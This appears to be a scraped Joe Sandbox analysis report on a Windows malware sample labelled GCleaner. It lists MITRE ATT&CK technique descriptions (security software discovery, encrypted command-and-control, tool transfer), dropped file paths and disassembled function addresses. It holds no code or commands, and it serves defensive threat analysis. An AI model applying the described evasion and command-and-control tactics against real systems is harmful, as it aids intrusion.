Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: GCleaner

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_687823f3e027695faa9d88d81b6c04ef2f38cb4_d32b1248_a9fcd368-4032-4731-992d-7df4f590d10d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5099.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51A4.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51C4.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\download[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\download[1].htm

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
file.exe

Function 004306A8 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 243
librarymemorypipeCOMMON

Function 004018E0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 298
networkfileCOMMON

Function 00404530 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 375
COMMON

Function 0040C4F1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 007C51AE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 004017A0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 103
networkCOMMON

Function 00403B60 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 585
COMMON

Function 005F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00403460 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76
COMMON

Function 004032C0 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Function 004033C0 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Function 00401DC0 Relevance: 3.2, APIs: 2, Instructions: 174
COMMON

Function 005F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 00404130 Relevance: 2.7, APIs: 2, Instructions: 171
sleepCOMMON